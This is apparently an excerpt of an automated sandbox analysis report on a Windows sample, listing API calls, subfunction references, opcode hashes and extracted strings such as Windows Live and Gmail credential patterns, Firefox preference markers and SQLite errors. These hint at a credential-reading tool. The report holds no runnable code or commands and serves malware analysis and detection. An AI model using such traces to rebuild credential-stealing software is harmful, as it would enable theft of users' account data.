                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040FA35
                                                                                                                                                                                                                                    • _strnicmp.MSVCRT ref: 0040FA4F
                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA7B
                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA9B
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ByteCharMultiWide$Version_strnicmpmemset
                                                                                                                                                                                                                                    • String ID: WindowsLive:name=*$windowslive:name=
                                                                                                                                                                                                                                    • API String ID: 945165440-3589380929
                                                                                                                                                                                                                                    • Opcode ID: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                                                                                                                                                                                                                                    • Instruction ID: 67e4bc7d9cc92e77f49167b45697c8bd07ba2e516c4687fa62adfbc1007618b4
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D1418BB1508345AFC720DF24D88496BB7ECEB85304F004A3EF99AA3691D738DD48CB66
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 00410863: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                                                                                                                                                                                                                      • Part of subcall function 00410863: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                                                                                                                                                                                                                      • Part of subcall function 00410863: memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 004108C3
                                                                                                                                                                                                                                      • Part of subcall function 00410863: CoTaskMemFree.COMBASE(?), ref: 004108D2
                                                                                                                                                                                                                                    • strchr.MSVCRT ref: 0040371F
                                                                                                                                                                                                                                    • _mbscpy.MSVCRT(?,00000001,?,?,?), ref: 00403748
                                                                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?,?,00000001,?,?,?), ref: 00403758
                                                                                                                                                                                                                                    • strlen.MSVCRT ref: 00403778
                                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040379C
                                                                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?), ref: 004037B2
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _mbscpy$FromStringUuid$FreeTaskmemcpysprintfstrchrstrlen
                                                                                                                                                                                                                                    • String ID: %s@gmail.com
                                                                                                                                                                                                                                    • API String ID: 3261640601-4097000612
                                                                                                                                                                                                                                    • Opcode ID: 11ccb4e93ce9d0da07274c25f249dad5774019e44f0a519d17107d0dc001407b
                                                                                                                                                                                                                                    • Instruction ID: 26c7b24e36a56a715c82424c63065c573d607dcbd7bcbeb2789f412f71db7656
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 11ccb4e93ce9d0da07274c25f249dad5774019e44f0a519d17107d0dc001407b
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2F21AEF290415C5AEB11DB95DCC5FDAB7FCEB54308F0405ABF108E3181EA78AB888B65
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 004094C8
                                                                                                                                                                                                                                    • GetDlgCtrlID.USER32(?), ref: 004094D3
                                                                                                                                                                                                                                    • GetWindowTextA.USER32(?,?,00001000), ref: 004094E6
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040950C
                                                                                                                                                                                                                                    • GetClassNameA.USER32(?,?,000000FF), ref: 0040951F
                                                                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 00409531
                                                                                                                                                                                                                                      • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                                                                                                                                                                                                                                    • String ID: sysdatetimepick32
                                                                                                                                                                                                                                    • API String ID: 3411445237-4169760276
                                                                                                                                                                                                                                    • Opcode ID: 20710c655bcd130c2a45dbc3c3fabc14bf10f5b62d17aada42eac2fe00d5bba0
                                                                                                                                                                                                                                    • Instruction ID: 275a188ed2e8c4d5dd974f468a7d06fe6df33147f8fd952053c2ef98a917a35b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 20710c655bcd130c2a45dbc3c3fabc14bf10f5b62d17aada42eac2fe00d5bba0
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2D11E773C051297EEB129754DC81EEF7BACEF5A315F0400B6FA08E2151E674DE848A64
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405A31
                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405A47
                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405A5F
                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405A7A
                                                                                                                                                                                                                                    • EndDialog.USER32(?,00000002), ref: 00405A96
                                                                                                                                                                                                                                    • EndDialog.USER32(?,00000001), ref: 00405AA9
                                                                                                                                                                                                                                      • Part of subcall function 00405737: GetDlgItem.USER32(?,000003E9), ref: 00405745
                                                                                                                                                                                                                                      • Part of subcall function 00405737: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 0040575A
                                                                                                                                                                                                                                      • Part of subcall function 00405737: SendMessageA.USER32(?,00001032,00000000,00000000), ref: 00405776
                                                                                                                                                                                                                                    • SendDlgItemMessageA.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405AC1
                                                                                                                                                                                                                                    • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405BC9
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Item$DialogMessageSend
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2485852401-0
                                                                                                                                                                                                                                    • Opcode ID: ec9303a4946bc0e02ff46f830e49cd5227634f9872e1f7ef617901a07ad17536
                                                                                                                                                                                                                                    • Instruction ID: 49f8b46d81ffaaf96d74304be2fa091063820ac2067ea90d1efd1f4607779086
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ec9303a4946bc0e02ff46f830e49cd5227634f9872e1f7ef617901a07ad17536
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BC619230600A45ABEB21AF65C8C5A2BB7A5EF40718F04C23BF515A76D1E778EA50CF58
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
                                                                                                                                                                                                                                    • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
                                                                                                                                                                                                                                    • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
                                                                                                                                                                                                                                    • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
                                                                                                                                                                                                                                    • GetSysColor.USER32(0000000F), ref: 0040B472
                                                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 0040B4A6
                                                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 0040B4A9
                                                                                                                                                                                                                                    • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: MessageSend$DeleteImageLoadObject$Color
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3642520215-0
                                                                                                                                                                                                                                    • Opcode ID: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                                                                                                                                                                    • Instruction ID: 78997c319ae04cc2c464f68e1b112159c67c6e7e05dd954700a2b997fe6bb290
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5A317275680308BFFA715B70DC87FD6B695EB48B00F104828F3857A1E1CAF279909B68
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 00405BE9
                                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00405C05
                                                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405C2B
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00405C3B
                                                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405C6A
                                                                                                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00405CB7
                                                                                                                                                                                                                                    • SetFocus.USER32(?,?,?,?), ref: 00405CC0
                                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00405CD0
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2313361498-0
                                                                                                                                                                                                                                    • Opcode ID: 20fe0494e672a329d8c574fdcc403b16352a75b97cc0102977cb83616af43d0a
                                                                                                                                                                                                                                    • Instruction ID: 76b7db47255e00c5a16d586f34bfaf53fe76d4163934589152c5d70c184cfcdd
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 20fe0494e672a329d8c574fdcc403b16352a75b97cc0102977cb83616af43d0a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AF31B3B1500605AFEB24AF69CC85E2AF7A8FF44354B00853FF55AE76A1D778EC408B94
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0040BB33
                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0040BB49
                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0040BB5C
                                                                                                                                                                                                                                    • BeginDeferWindowPos.USER32(00000003), ref: 0040BB79
                                                                                                                                                                                                                                    • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040BB96
                                                                                                                                                                                                                                    • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040BBB6
                                                                                                                                                                                                                                    • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000004), ref: 0040BBDD
                                                                                                                                                                                                                                    • EndDeferWindowPos.USER32(?), ref: 0040BBE6
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Window$Defer$Rect$BeginClient
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2126104762-0
                                                                                                                                                                                                                                    • Opcode ID: 79eb62364e7a0dcd77e9d411930711777f01ecf57ddd8cbf010404b9f010fc5c
                                                                                                                                                                                                                                    • Instruction ID: 10c9609a041f1aae696d54cc03c31aacdb7ad71aa251d7cd9d71944ddb51ea6f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 79eb62364e7a0dcd77e9d411930711777f01ecf57ddd8cbf010404b9f010fc5c
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4521C376A00209FFDB518FE8DD89FEEBBB9FB08700F144065FA55A2160C771AA519B24
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000011), ref: 004072E7
                                                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000010), ref: 004072ED
                                                                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 004072FB
                                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040730D
                                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 00407316
                                                                                                                                                                                                                                    • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                                                                                                                                                                                                                                    • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                                                                                                                                                                                                                                    • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407371
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1999381814-0
                                                                                                                                                                                                                                    • Opcode ID: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                                                                                                                                                                    • Instruction ID: 22bb5f5faf33eb927601db2df5736372c6ae1ca5e65390263d5238b88a5d6584
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C611A536E00219AFDF008FF9DC49BAE7FB9EB44311F040175EE05E3290DA70A8418A90
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memcpymemset
                                                                                                                                                                                                                                    • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                                                                                                                                                                                                                    • API String ID: 1297977491-3883738016
                                                                                                                                                                                                                                    • Opcode ID: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                                                                                                                                                                    • Instruction ID: e5ed660087d787d4baabea17299805ba1702756b87ddf288a6169370bd8562d9
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FA128D75A00629DFCB14DF68E480AADBBB1BF08314F65409BE945AB341D738F981CF99
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 00449550: memset.MSVCRT ref: 0044955B
                                                                                                                                                                                                                                      • Part of subcall function 00449550: memset.MSVCRT ref: 0044956B
                                                                                                                                                                                                                                      • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                                                                                                                                                                                      • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000040), ref: 0044972E
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044977B
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000040), ref: 004497F6
                                                                                                                                                                                                                                      • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000040,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 00449291
                                                                                                                                                                                                                                      • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000008,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 004492DD
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000000), ref: 00449846
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 00449887
                                                                                                                                                                                                                                    • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 004498B8
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memcpy$memset
                                                                                                                                                                                                                                    • String ID: gj
                                                                                                                                                                                                                                    • API String ID: 438689982-4203073231
                                                                                                                                                                                                                                    • Opcode ID: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                                                                                                                                                                                                    • Instruction ID: 4698d9130898d2a28bd34890c38a7d1df91d0c58a43dc6add7b2b2ec2d892026
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AB71C9B35083448BE310EF65D88069FB7E9BFD5344F050A2EE98997301E635DE09C796
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040DAE3
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040DAF7
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040DB0B
                                                                                                                                                                                                                                      • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                                                                                                                                                                                      • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                                                                                                                                                                                      • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC1B
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memcpymemset$strlen$_memicmp
                                                                                                                                                                                                                                    • String ID: user_pref("
                                                                                                                                                                                                                                    • API String ID: 765841271-2487180061
                                                                                                                                                                                                                                    • Opcode ID: 9f3536b0c4b6552aef583bc432abc8b8f220ef95764321c1a442fafe8de8c1cc
                                                                                                                                                                                                                                    • Instruction ID: f707cbd7524a382ab05823b92859e6f0e78dc23985d18c56f1e7f2c379abc130
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9f3536b0c4b6552aef583bc432abc8b8f220ef95764321c1a442fafe8de8c1cc
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0B4175769041189AD714DBA5DC81FDA77ACAF44314F1042BBA605B7181EA38AB49CFA8
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405827
                                                                                                                                                                                                                                    • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 00405840
                                                                                                                                                                                                                                    • SendMessageA.USER32(?,00001036,00000000,00000026), ref: 0040584D
                                                                                                                                                                                                                                    • SendMessageA.USER32(?,0000101C,00000000,00000000), ref: 00405859
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 004058C3
                                                                                                                                                                                                                                    • SendMessageA.USER32(?,00001019,?,?), ref: 004058F4
                                                                                                                                                                                                                                    • SetFocus.USER32(?), ref: 00405976
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: MessageSend$FocusItemmemset
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 4281309102-0
                                                                                                                                                                                                                                    • Opcode ID: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                                                                                                                                                                                                                                    • Instruction ID: c72ca3e99ea405196032a5824f130882485a5617ada8e3d881518c79e7018221
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4241F8B5900209AFDB20DF94DC81EAEBBB9EF04358F1440AAE908B7291D7759E50DF94
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                                                                                                                                      • Part of subcall function 00406D33: WriteFile.KERNEL32(0044CBC0,00000001,00000000,75C50A60,00000000,?,?,0040A7BE,00000001,0044CBC0,75C50A60), ref: 00406D4D
                                                                                                                                                                                                                                    • _mbscat.MSVCRT ref: 0040A8FF
                                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040A921
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FileWrite_mbscatsprintfstrlen
                                                                                                                                                                                                                                    • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                                                                                                                                    • API String ID: 1631269929-4153097237
                                                                                                                                                                                                                                    • Opcode ID: bcdc90beea248a1f5fcb7e61ec68337fdc50f98531e0a76bef795410e8d5f8aa
                                                                                                                                                                                                                                    • Instruction ID: 568bce87a3ef0860ab630a318aded4c5cbf938598f8cce33e7c60ad495c5b4cb
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bcdc90beea248a1f5fcb7e61ec68337fdc50f98531e0a76bef795410e8d5f8aa
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 88318F32900208AFDF15DF94C886EDE7BB5FF44314F11416AF911BB2A2D779A951CB84
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040810E
                                                                                                                                                                                                                                      • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                                                                                                                                                                      • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                                                                                                                                                                                      • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                                                                                                                                      • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
